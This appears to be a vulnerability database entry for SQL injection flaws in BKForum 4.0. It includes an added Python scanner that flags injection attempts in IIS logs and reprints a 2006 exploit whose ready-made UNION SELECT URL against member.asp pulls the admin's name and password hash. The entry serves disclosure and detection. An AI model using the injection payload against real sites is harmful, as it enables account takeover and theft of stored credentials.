Black Knight Forum Multiple SQL Injection Vulnerabilities

Vulnerability ID: 1110132; Vulnerability type: SQL injection
Published: 2006-04-24; Updated: 2006-04-24
CVE ID: CVE-2005-1287; CNNVD-ID: CNNVD-200504-087
Platform: ASP; CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/1714
https://www.securityfocus.com/bid/82360
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200504-087
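|Vulnerability details
BKforum is ASP-based forum software from BlackKnight. BKForum 4.0 contains multiple SQL injection vulnerabilities that allow remote attackers to execute arbitrary SQL commands via (1) the id parameter passed to member.asp, (2) the forum parameter passed to forum.asp, or (3) various parameters in register.asp.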
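A log check for the first two entry points named above, added here as an example; it is not code from the advisory or from BKForum. It assumes IIS W3C extended logs and that `id` and `forum` are meant to carry numeric record IDs; the log lines, paths and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Page -> parameter, as named in the advisory text. Assumption: both carry
# numeric record IDs, so anything that is not a short run of digits is suspect.
NUMERIC_PARAMS = {"member.asp": "id", "forum.asp": "forum"}
DIGITS = re.compile(r"[0-9]{1,10}")

# Constructed sample in IIS W3C extended format (not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2006-04-25 10:00:01 192.0.2.10 GET /path/member.asp id=12 200
2006-04-25 10:00:05 192.0.2.77 GET /path/member.asp id=-1%20UNION%20SELECT%201,memName,3%20FROM%20member 200
2006-04-25 10:00:09 192.0.2.10 GET /path/forum.asp forum=abc 200
2006-04-25 10:00:12 192.0.2.10 GET /path/default.asp - 200
"""

def bad_value(uri_stem, uri_query):
    """Return the decoded non-numeric value, or None if the request is clean."""
    param = NUMERIC_PARAMS.get(uri_stem.rsplit("/", 1)[-1].lower())
    if param is None or uri_query == "-":
        return None
    # parse_qs percent-decodes values and maps '+' to a space.
    for key, values in parse_qs(uri_query, keep_blank_values=True).items():
        if key.lower() == param:
            for value in values:
                if not DIGITS.fullmatch(value):
                    return value
    return None

def scan_iis_log(lines):
    """Return (client_ip, uri_stem, decoded_value) for each flagged request."""
    fields, hits = [], []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order is declared per log file
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split(" ")))
            value = bad_value(row.get("cs-uri-stem", ""), row.get("cs-uri-query", "-"))
            if value is not None:
                hits.append((row.get("c-ip"), row.get("cs-uri-stem"), value))
    return hits

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG.splitlines()):
        print(hit)
```

The same digits-only rule, applied in the ASP page before the value reaches the SQL string, is the corresponding input check; register.asp takes free-text fields and needs parameterized queries instead.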
|Exploit
# BK Forum <= 4.0 Remote SQL Injection
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
# Exploit:

First you must be logged in
Then type this in your browser

http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1

You will find admin's password

# Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00

# Have phun!

# milw0rm.com [2006-04-24]
|Affected products
Bk Dev Bk Forum 4
|References

Source: MISC
Link: http://www.digitalparadox.org/advisories/bkdev.txt
Source: SECTRACK
Name: 1013793
Link: http://securitytracker.com/id?1013793
Source: SECUNIA
Name: 15072
Link: http://secunia.com/advisories/15072
Source: BUGTRAQ
Name: 20060423 BK Forum <= 4.0 Remote SQL Injection
Link: http://www.securityfocus.com/archive/1/archive/1/431863/100/0/threaded
Source: BUGTRAQ
Name: 20060421 BKForum <<--V.4.0 SQL Injection
Link: http://www.securityfocus.com/archive/1/archive/1/431659/100/0/threaded
Source: OSVDB
Name: 15786
Link: http://www.osvdb.org/15786
Source: OSVDB
Name: 15785
Link: http://www.osvdb.org/15785
Source: OSVDB
Name: 15784
Link: http://www.osvdb.org/15784
Source: BUGTRAQ
Name: 20050423 Multiple Sql injection vulnerabilities in BKForum v.4
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111428133317901&w=2